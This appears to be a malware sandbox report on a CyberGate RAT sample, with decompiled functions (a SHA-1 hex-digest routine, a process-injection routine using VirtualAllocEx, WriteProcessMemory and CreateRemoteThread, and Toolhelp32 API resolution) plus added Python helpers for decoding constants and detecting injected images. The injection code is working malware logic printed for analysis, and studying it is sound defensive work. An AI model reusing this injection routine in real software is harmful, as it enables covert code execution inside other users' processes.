                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				signed int _v40;
                                    				char _v44;
                                    				signed char _t43;
                                    				long* _t50;
                                    				intOrPtr _t66;
                                    				intOrPtr _t71;
                                    				void* _t76;
                                    				void* _t94;
                                    				intOrPtr _t103;
                                    				intOrPtr _t104;
                                    				signed char _t112;
                                    				void* _t113;
                                    				signed int _t115;
                                    				void* _t116;
                                    				char* _t117;
                                    				void* _t119;
                                    
                                    				asm("adc [edx], eax");
                                    				_t43 =  *__eax ^  *[cs:ecx];
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *__ecx =  *__ecx + __edx;
                                    				 *_t43 =  *_t43 + _t43;
                                    				 *_t43 =  *_t43 + _t43;
                                    				asm("adc [eax], al");
                                    				_t115 = __esi | _a73;
                                    				_t117 =  &_a1;
                                    				asm("aaa");
                                    				_pop(_t111);
                                    				asm("arpl [gs:edi+0x64], bp");
                                    				_push(_t117);
                                    				_push(_t117);
                                    				_push(_t115);
                                    				_v44 = 0;
                                    				_v32 = 0;
                                    				_v28 = 0;
                                    				_v16 = 0;
                                    				_t116 = __edx;
                                    				_t112 = _t43;
                                    				_push(_t119);
                                    				_push(0x408c74);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t119 + 0xffffffd8;
                                    				_t94 = 0;
                                    				E00401AC0(__edx);
                                    				CryptAcquireContextA( &_v8, 0, 0, 1, 0);
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0x8004);
                                    				_t50 = _v8;
                                    				_push(_t50);
                                    				L00408978();
                                    				if(_t50 != 0) {
                                    					_push(0);
                                    					E00402218( &_v28, _t112);
                                    					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1);
                                    					_push(_t112);
                                    					_t66 = _v12;
                                    					_push(_t66);
                                    					L00408980();
                                    					if(_t66 != 0) {
                                    						_v20 = 0x14;
                                    						_push(0x14);
                                    						E00402FBC();
                                    						_push(0);
                                    						_push( &_v20);
                                    						_push(_v16);
                                    						_push(2);
                                    						_t71 = _v12;
                                    						_push(_t71);
                                    						L00408970();
                                    						if(_t71 != 0) {
                                    							_push(_v12);
                                    							L00408988();
                                    							CryptReleaseContext(_v8, 0);
                                    							_t76 = _v20 - 1;
                                    							if(_t76 >= 0) {
                                    								_v24 = _t76 + 1;
                                    								_t113 = 0;
                                    								do {
                                    									_t94 = _t94 +  *(_v16 + _t113);
                                    									_v40 =  *(_v16 + _t113) & 0x000000ff;
                                    									_v36 = 0;
                                    									E004089C8(0x408c8c, _t94, 0,  &_v40, _t113, _t116,  &_v32);
                                    									E00401D58(_t116, _v32);
                                    									_t113 = _t113 + 1;
                                    									_t30 =  &_v24;
                                    									 *_t30 = _v24 - 1;
                                    								} while ( *_t30 != 0);
                                    							}
                                    							_v40 = 0;
                                    							_v36 = 0;
                                    							E004089C8(0x408c8c, _t94, 0,  &_v40, _t112, _t116,  &_v44);
                                    							E00401D58(_t116, _v44);
                                    						}
                                    					}
                                    				}
                                    				_pop(_t103);
                                    				 *[fs:eax] = _t103;
                                    				_push(E00408C7B);
                                    				E00401AC0( &_v44);
                                    				E00401AC0( &_v32);
                                    				E00402108( &_v28);
                                    				_t104 =  *0x408ad4; // 0x408ad8
                                    				return E00402FC8( &_v16, _t104);
                                    			}
                                    Instruction addresses for the listing above: 0x00408ad8 through 0x00408c73 (the per-line address column of the decompiler view, separated from its source lines by extraction).

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction ID: d3845163c2b931c13764af6d44d3521470b732fafe65dfe0c77c1fbeb44f725f
                                    • Opcode Fuzzy Hash: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction Fuzzy Hash: 04513070A04249AFDB01EBA5C941BEEBBB8AF09304F5540BFF540F72D1DA7899058B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%
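                                    The function above (the same sequence reappears in E00408AF8 below) is a CryptoAPI SHA-1 hex-digest routine: CryptAcquireContextA with PROV_RSA_FULL (1), CryptCreateHash with Algid 0x8004 (CALG_SHA1), CryptHashData over the caller's string, CryptGetHashParam(HP_HASHVAL = 2) into a 0x14-byte buffer, CryptDestroyHash/CryptReleaseContext, then a loop that formats each of the 20 digest bytes with "%2.2X" and appends it, yielding 40 uppercase hex characters. The Python below is an added example, not code from the sample or the report. It parses API-trace lines in the format the report uses (the two lines from the APIs list above are embedded as sample input), names the hash algorithm from the Algid and checks that the digest buffer size agrees with it, and reproduces the output format with hashlib. The length expression handed to CryptHashData is not reliably recoverable from the decompile, so sha1_hex_upper hashes exactly the bytes it is given; whether the sample includes a terminator or hashes a wide string is left open.

```python
"""Read the hash algorithm off a CryptoAPI call trace and reproduce the digest format.

Added example; not code from the sample or from the report. The constants are
the standard CryptoAPI values; the sample trace lines are copied from the APIs
list above. Assumption: the input encoding the sample hashes is unknown, so
sha1_hex_upper() hashes the bytes it receives unchanged.
"""
import hashlib
import re

# CryptoAPI constants seen at the call sites in the listing.
PROV_RSA_FULL = 0x1   # CryptAcquireContextA dwProvType
HP_HASHVAL = 0x2      # CryptGetHashParam dwParam: retrieve the finished digest
CALG_NAMES = {
    0x8001: "CALG_MD2", 0x8002: "CALG_MD4", 0x8003: "CALG_MD5",
    0x8004: "CALG_SHA1", 0x800C: "CALG_SHA_256",
    0x800D: "CALG_SHA_384", 0x800E: "CALG_SHA_512",
}
DIGEST_LEN = {"CALG_MD5": 0x10, "CALG_SHA1": 0x14, "CALG_SHA_256": 0x20,
              "CALG_SHA_384": 0x30, "CALG_SHA_512": 0x40}

# Sample input: the two trace lines from the report that fix the algorithm.
SAMPLE_API_LINES = [
    "• CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C",
    "• CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2",
]

_API_LINE = re.compile(r"^\W*(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)\s*$")


def parse_api_line(line):
    """Split 'Name.Module(args), ref: addr' into (name, module, args, addr);
    unknown arguments written as '?' become None, the rest are parsed as hex."""
    m = _API_LINE.match(line)
    if not m:
        raise ValueError("not an API trace line: %r" % line)
    name, module, raw_args, ref = m.groups()
    args = [None if a.strip() == "?" else int(a, 16) for a in raw_args.split(",")]
    return name, module, args, int(ref, 16)


def identify_hash(lines):
    """Name the algorithm from CryptCreateHash's Algid (second argument) and
    confirm the buffer size passed to CryptGetHashParam(HP_HASHVAL) matches it."""
    algid = cb_digest = None
    for line in lines:
        name, _, args, _ = parse_api_line(line)
        if name == "CryptCreateHash":
            algid = args[1]
        elif name == "CryptGetHashParam" and args[1] == HP_HASHVAL:
            cb_digest = args[3]
    if algid is None:
        return "unknown", False
    alg = CALG_NAMES.get(algid, "CALG_%04X" % algid)
    return alg, cb_digest == DIGEST_LEN.get(alg)


def sha1_hex_upper(data: bytes) -> str:
    """What the CryptoAPI sequence plus the "%2.2X" loop produces: the 20 digest
    bytes as 40 uppercase hex characters."""
    return "".join("%2.2X" % b for b in hashlib.sha1(data).digest())


if __name__ == "__main__":
    alg, size_ok = identify_hash(SAMPLE_API_LINES)
    print("algorithm from trace: %s (digest buffer consistent: %s)" % (alg, size_ok))
    print("SHA-1 of b'abc' in the routine's format:", sha1_hex_upper(b"abc"))
```

                                    When triaging a family that authenticates to its controller with a hashed password, the uppercase 40-character form is the value to look for in captured traffic or in the configuration; comparing it against sha1_hex_upper() of candidate strings (with and without a terminator, ANSI and UTF-16) settles the encoding question the decompile leaves open.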

                                    C-Code - Quality: 61%
                                    			E00408AF8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				long* _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				signed int _v40;
                                    				char _v44;
                                    				long* _t47;
                                    				intOrPtr _t63;
                                    				intOrPtr _t68;
                                    				void* _t73;
                                    				void* _t91;
                                    				intOrPtr _t99;
                                    				intOrPtr _t100;
                                    				void* _t108;
                                    				void* _t109;
                                    				void* _t111;
                                    				void* _t114;
                                    
                                    				_v44 = 0;
                                    				_v32 = 0;
                                    				_v28 = 0;
                                    				_v16 = 0;
                                    				_t111 = __edx;
                                    				_t108 = __eax;
                                    				_push(_t114);
                                    				_push(0x408c74);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t114 + 0xffffffd8;
                                    				_t91 = 0;
                                    				E00401AC0(__edx);
                                    				CryptAcquireContextA( &_v8, 0, 0, 1, 0); // dwProvType 1 = PROV_RSA_FULL, default key container
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0x8004); // ALG_ID 0x8004 = CALG_SHA1
                                    				_t47 = _v8;
                                    				_push(_t47);
                                    				L00408978(); // CryptCreateHash (APIs below, ref 00408B4C)
                                    				if(_t47 != 0) {
                                    					_push(0);
                                    					E00402218( &_v28, _t108);
                                    					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1); // dwDataLen; the decompiler shows the length term twice, so the exact byte count hashed is not reliable here
                                    					_push(_t108);
                                    					_t63 = _v12;
                                    					_push(_t63);
                                    					L00408980(); // CryptHashData (ref 00408B76)
                                    					if(_t63 != 0) {
                                    						_v20 = 0x14; // 20 bytes = SHA-1 digest length
                                    						_push(0x14);
                                    						E00402FBC();
                                    						_push(0);
                                    						_push( &_v20);
                                    						_push(_v16);
                                    						_push(2); // dwParam 2 = HP_HASHVAL
                                    						_t68 = _v12;
                                    						_push(_t68);
                                    						L00408970(); // CryptGetHashParam (ref 00408BB2)
                                    						if(_t68 != 0) {
                                    							_push(_v12);
                                    							L00408988(); // CryptDestroyHash (ref 00408BC3)
                                    							CryptReleaseContext(_v8, 0);
                                    							_t73 = _v20 - 1;
                                    							if(_t73 >= 0) {
                                    								_v24 = _t73 + 1;
                                    								_t109 = 0;
                                    								do {
                                    									_t91 = _t91 +  *(_v16 + _t109); // running byte sum, purpose not visible in this listing
                                    									_v40 =  *(_v16 + _t109) & 0x000000ff;
                                    									_v36 = 0;
                                    									E004089C8(0x408c8c, _t91, 0,  &_v40, _t109, _t111,  &_v32); // wvsprintfA wrapper, format "%2.2X": one digest byte as two uppercase hex digits, appended to the result string
                                    									E00401D58(_t111, _v32);
                                    									_t109 = _t109 + 1;
                                    									_t29 =  &_v24;
                                    									 *_t29 = _v24 - 1;
                                    								} while ( *_t29 != 0);
                                    							}
                                    							_v40 = 0;
                                    							_v36 = 0;
                                    							E004089C8(0x408c8c, _t91, 0,  &_v40, _t108, _t111,  &_v44);
                                    							E00401D58(_t111, _v44);
                                    						}
                                    					}
                                    				}
                                    				_pop(_t99);
                                    				 *[fs:eax] = _t99;
                                    				_push(E00408C7B);
                                    				E00401AC0( &_v44);
                                    				E00401AC0( &_v32);
                                    				E00402108( &_v28);
                                    				_t100 =  *0x408ad4; // 0x408ad8
                                    				return E00402FC8( &_v16, _t100);
                                    			}

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction ID: 55925fcc99f9e55126638c730d6fbe2105b7814248b5782dab5394ac9007a686
                                    • Opcode Fuzzy Hash: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction Fuzzy Hash: EE412470A442099BDB00EBA5C942BEEB7F8EF48704F54407EF540F72D1DB7899058B69
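                                    Worked example (added here; it is not code from the report or from the CyberGate sample): decoding the CryptoAPI constants that identify what E00408AF8 does, and reproducing its output so an analyst can match the strings it produces. 0x8004 is ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_SHA1, i.e. CALG_SHA1; dwParam 2 is HP_HASHVAL; 0x14 is the 20-byte SHA-1 digest that the loop turns into uppercase hex with "%2.2X". The length passed to CryptHashData is garbled in the decompilation (the string length plus one appears twice), so whether the terminating NUL is hashed cannot be read off this listing; the helper hashes exactly the bytes it is given, and anyone matching output from a live sample should also try the input with a trailing b"\0". The running byte sum kept in _t91 and the extra value formatted after the loop are left out because their purpose is not clear from the listing. The table of ALG_IDs goes beyond the one constant the function uses so the same helper names the algorithm in other CryptoAPI call sites.

```python
"""Added example: decode the CryptoAPI constants used by E00408AF8 and
reproduce its hex-digest output. Not code from the report or the sample."""
import hashlib

# ALG_ID layout (wincrypt.h): bits 13-15 = class, bits 9-12 = type, bits 0-8 = SID.
ALG_CLASSES = {0x0000: "ANY", 0x2000: "SIGNATURE", 0x4000: "MSG_ENCRYPT",
               0x6000: "DATA_ENCRYPT", 0x8000: "HASH", 0xA000: "KEY_EXCHANGE"}
ALG_TYPES = {0x000: "ANY", 0x200: "DSS", 0x400: "RSA", 0x600: "BLOCK",
             0x800: "STREAM", 0xA00: "DH", 0xC00: "SECURECHANNEL"}
CALG_NAMES = {0x8001: "CALG_MD2", 0x8002: "CALG_MD4", 0x8003: "CALG_MD5",
              0x8004: "CALG_SHA1", 0x800C: "CALG_SHA_256", 0x800D: "CALG_SHA_384",
              0x800E: "CALG_SHA_512", 0x6601: "CALG_DES", 0x6602: "CALG_RC2",
              0x6603: "CALG_3DES", 0x6801: "CALG_RC4", 0x660E: "CALG_AES_128",
              0x660F: "CALG_AES_192", 0x6610: "CALG_AES_256",
              0x2400: "CALG_RSA_SIGN", 0xA400: "CALG_RSA_KEYX"}
# Digest sizes CryptGetHashParam(HP_HASHVAL) returns, and the hashlib equivalents.
DIGEST_LEN = {0x8001: 16, 0x8002: 16, 0x8003: 16, 0x8004: 20,
              0x800C: 32, 0x800D: 48, 0x800E: 64}
HASHLIB_NAME = {0x8003: "md5", 0x8004: "sha1", 0x800C: "sha256",
                0x800D: "sha384", 0x800E: "sha512"}
HP_HASHVAL = 0x0002      # dwParam the sample passes to CryptGetHashParam
PROV_RSA_FULL = 1        # dwProvType the sample passes to CryptAcquireContextA


def decode_alg_id(alg_id):
    """Split a CryptoAPI ALG_ID into class, type and SID and name it.
    decode_alg_id(0x8004) -> class HASH, type ANY, sid 4 = CALG_SHA1."""
    return {
        "class": ALG_CLASSES.get(alg_id & 0xE000, hex(alg_id & 0xE000)),
        "type": ALG_TYPES.get(alg_id & 0x1E00, hex(alg_id & 0x1E00)),
        "sid": alg_id & 0x1FF,
        "name": CALG_NAMES.get(alg_id, "unknown"),
        "digest_len": DIGEST_LEN.get(alg_id),
    }


def hash_like_sample(data, alg_id=0x8004, buf_len=0x14):
    """Reproduce E00408AF8: hash `data` with the algorithm `alg_id` names and
    format each digest byte with "%2.2X" (two uppercase hex digits), as the
    sample's wvsprintfA loop does. `buf_len` mirrors the 0x14-byte buffer the
    sample hands to CryptGetHashParam; a buffer smaller than the digest makes
    that call fail with ERROR_MORE_DATA, modelled here as a ValueError."""
    if alg_id not in DIGEST_LEN:
        raise ValueError("not a hash ALG_ID: %#x" % alg_id)
    if buf_len < DIGEST_LEN[alg_id]:
        raise ValueError("CryptGetHashParam buffer too small (ERROR_MORE_DATA)")
    if alg_id not in HASHLIB_NAME:
        raise ValueError("no portable implementation for %s" % CALG_NAMES[alg_id])
    digest = hashlib.new(HASHLIB_NAME[alg_id], data).digest()
    return "".join("%2.2X" % b for b in digest)


if __name__ == "__main__":
    print(decode_alg_id(0x8004))
    # Constructed input; matching a live sample may need a trailing b"\0".
    print(hash_like_sample(b"abc"))
```

                                    The same decode_alg_id lookup names the immediate pushed before CryptCreateHash, CryptDeriveKey or CryptImportKey in other samples, which is usually faster than reading the provider calls around it.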
                                    C-Code - Quality: 76%
                                    			E0040AF08(void* __eax, void* __ecx, _Unknown_base(*)()* __edx) {
                                    				long _v20;
                                    				long _v24;
                                    				intOrPtr _v28;
                                    				void* _v32;
                                    				_Unknown_base(*)()* _v36;
                                    				void* _t18;
                                    				void* _t30;
                                    				struct HINSTANCE__* _t32;
                                    				void* _t35;
                                    				long _t36;
                                    				void* _t37;
                                    
                                    				_v32 = __ecx;
                                    				_v36 = __edx;
                                    				_t30 = __eax;
                                    				_v28 = 0;
                                    				_t32 = GetModuleHandleA(0);
                                    				_push(0);
                                    				_push(_t32);
                                    				asm("cdq");
                                    				_t18 =  *((intOrPtr*)(_t32 + 0x3c)) + _v20; // IMAGE_DOS_HEADER.e_lfanew of the sample's own image; the "+ _v20" is how the decompiler rendered the cdq/adc sequence, the intended value is base + e_lfanew (IMAGE_NT_HEADERS)
                                    				asm("adc edx, [esp+0x4]");
                                    				_t36 =  *(_t18 + 0x50); // IMAGE_OPTIONAL_HEADER.SizeOfImage
                                    				_t35 =  *(_t18 + 0x34); // IMAGE_OPTIONAL_HEADER.ImageBase
                                    				VirtualFreeEx(_t30, _t35, 0, 0x8000); // MEM_RELEASE: clear whatever the target has at the sample's preferred base
                                    				_t37 = VirtualAllocEx(_t30, _t35, _t36, 0x3000, 0x40); // MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE, fixed at ImageBase so the copy needs no relocation
                                    				if(_t37 != 0) {
                                    					WriteProcessMemory(_t30, _t35, GetModuleHandleA(0), _t36,  &_v24); // copy the whole mapped image into the target
                                    					if(_t36 <= _v24) { // proceed only if every byte was written
                                    						CreateRemoteThread(_t30, 0, 0, _v36, _v32, 0,  &_v20); // start routine = __edx, parameter = __ecx
                                    						CloseHandle(_t30);
                                    						_v32 = _t37;
                                    					}
                                    				}
                                    				return _v28;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                    • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                    • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                    • GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                    • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$ModuleVirtual$AllocCloseCreateFreeMemoryProcessRemoteThreadWrite
                                    • String ID:
                                    • API String ID: 2398686212-0
                                    • Opcode ID: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction ID: ba714f15e26322d81a3db079e442bf4d00767b5fd8d80c8da630a050ea91888e
                                    • Opcode Fuzzy Hash: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction Fuzzy Hash: D71142B12443007FD210EE698C46F2BBBDCDFC5715F44882EB658E72D1D674E904876A
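                                    Worked example (added here, not from the report or the sample) showing what E0040AF08 reads from its own image and what it leaves behind in the target. The function receives a target process handle in EAX, reads e_lfanew at base+0x3C, ImageBase at NT+0x34 and SizeOfImage at NT+0x50, releases (0x8000 = MEM_RELEASE) whatever the target has at that ImageBase, allocates the same range there with 0x3000 = MEM_COMMIT | MEM_RESERVE and 0x40 = PAGE_EXECUTE_READWRITE, copies its own mapped image over it, and starts a remote thread at the routine passed in EDX. Placing the copy at the preferred ImageBase avoids relocation, but the injection silently aborts if that address is not free in the target: VirtualAllocEx returns NULL and the function returns _v28, which this listing never sets to anything but 0, so the caller cannot tell. What the technique leaves in the target is a private, RWX region whose first bytes are a PE header with an ImageBase equal to the region base; the last function below applies that malfind-style check to constructed region descriptors. The header builder, the region list and its field names are assumptions made for the example.

```python
"""Added example: the PE fields E0040AF08 reads from its own image, and a
malfind-style scan for the region the injection leaves in the target.
Constructed test data only; not code from the report or the sample."""
import struct

# Constants from winnt.h / memoryapi.h that appear in the listing.
MEM_COMMIT, MEM_RESERVE, MEM_RELEASE = 0x1000, 0x2000, 0x8000
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE = 0x20, 0x40


def build_pe32_header(image_base, size_of_image, e_lfanew=0x80):
    """Build a minimal PE32 header (constructed data, not a real binary).
    Only the fields the injector touches carry meaningful values."""
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)          # IMAGE_DOS_HEADER.e_lfanew
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)              # PE32 magic
    struct.pack_into("<I", opt, 0x1C, image_base)         # ImageBase   = NT + 0x34
    struct.pack_into("<I", opt, 0x38, size_of_image)      # SizeOfImage = NT + 0x50
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)


def injector_view(image):
    """Return (ImageBase, SizeOfImage) using exactly the offsets the sample uses:
    e_lfanew at +0x3C, then NT+0x34 and NT+0x50 (PE32 layout)."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    image_base = struct.unpack_from("<I", image, e_lfanew + 0x34)[0]
    size_of_image = struct.unpack_from("<I", image, e_lfanew + 0x50)[0]
    return image_base, size_of_image


def describe_alloc(alloc_type, protect):
    """Name the VirtualAllocEx arguments the sample passes (0x3000, 0x40)."""
    names = [n for n, v in (("MEM_COMMIT", MEM_COMMIT), ("MEM_RESERVE", MEM_RESERVE))
             if alloc_type & v]
    prot = {PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
            PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE"}.get(protect, hex(protect))
    return "|".join(names) + ", " + prot


def write_is_complete(size_of_image, bytes_written):
    """The sample starts the remote thread only if SizeOfImage <= bytes written."""
    return size_of_image <= bytes_written


def find_injected_images(regions):
    """malfind-style heuristic over VirtualQuery-like region descriptors:
    private (not image-backed) RWX memory that begins with a PE header whose
    ImageBase equals the region base and whose SizeOfImage fits the region."""
    hits = []
    for r in regions:
        if r["type"] != MEM_PRIVATE or r["protect"] != PAGE_EXECUTE_READWRITE:
            continue
        if r["data"][:2] != b"MZ":
            continue
        try:
            base, size = injector_view(r["data"])
        except (ValueError, struct.error):
            continue
        if base == r["base"] and size <= r["size"]:
            hits.append(r["base"])
    return hits


def sample_regions():
    """Constructed target-process memory map: one legitimately loaded module,
    one injected image at 0x400000 (the sample's own base), one plain RWX stub."""
    return [
        {"base": 0x1000000, "size": 0x10000, "type": MEM_IMAGE,
         "protect": PAGE_EXECUTE_READ, "data": build_pe32_header(0x1000000, 0x10000)},
        {"base": 0x400000, "size": 0x10000, "type": MEM_PRIVATE,
         "protect": PAGE_EXECUTE_READWRITE, "data": build_pe32_header(0x400000, 0xE000)},
        {"base": 0x30000, "size": 0x1000, "type": MEM_PRIVATE,
         "protect": PAGE_EXECUTE_READWRITE, "data": b"\x90" * 64},
    ]


if __name__ == "__main__":
    print(describe_alloc(0x3000, 0x40))
    print([hex(b) for b in find_injected_images(sample_regions())])
```

                                    The same three conditions (private type, RWX protection, MZ at the region start) are what a memory-forensics pass over explorer.exe would flag after this sample runs; the ImageBase-equals-region-base test is the extra signal that the copy was placed at the PE's preferred address rather than relocated.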
                                    C-Code - Quality: 100%
                                    			E00404E10() {
                                    
                                    				if( *0x40e944 == 0) {
                                    					 *0x40e944 = GetModuleHandleA("kernel32.dll");
                                    					if( *0x40e944 != 0) {
                                    						 *0x40e948 = GetProcAddress( *0x40e944, "CreateToolhelp32Snapshot");
                                    						 *0x40e94c = GetProcAddress( *0x40e944, "Heap32ListFirst");
                                    						 *0x40e950 = GetProcAddress( *0x40e944, "Heap32ListNext");
                                    						 *0x40e954 = GetProcAddress( *0x40e944, "Heap32First");
                                    						 *0x40e958 = GetProcAddress( *0x40e944, "Heap32Next");
                                    						 *0x40e95c = GetProcAddress( *0x40e944, "Toolhelp32ReadProcessMemory");
                                    						 *0x40e960 = GetProcAddress( *0x40e944, "Process32First");
                                    						 *0x40e964 = GetProcAddress( *0x40e944, "Process32Next");
                                    						 *0x40e968 = GetProcAddress( *0x40e944, "Process32FirstW");
                                    						 *0x40e96c = GetProcAddress( *0x40e944, "Process32NextW");
                                    						 *0x40e970 = GetProcAddress( *0x40e944, "Thread32First");
                                    						 *0x40e974 = GetProcAddress( *0x40e944, "Thread32Next");
                                    						 *0x40e978 = GetProcAddress( *0x40e944, "Module32First");
                                    						 *0x40e97c = GetProcAddress( *0x40e944, "Module32Next");
                                    						 *0x40e980 = GetProcAddress( *0x40e944, "Module32FirstW");
                                    						 *0x40e984 = GetProcAddress( *0x40e944, "Module32NextW");
                                    					}
                                    				}
                                    				if( *0x40e944 == 0 ||  *0x40e948 == 0) {
                                    					return 0;
                                    				} else {
                                    					return 1;
                                    				}
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00405097,?,00000000,0040520D,00000000,004052C4), ref: 00404E24
                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00404E3C
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 00404E4E
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404E60
                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00404E72
                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00404E84
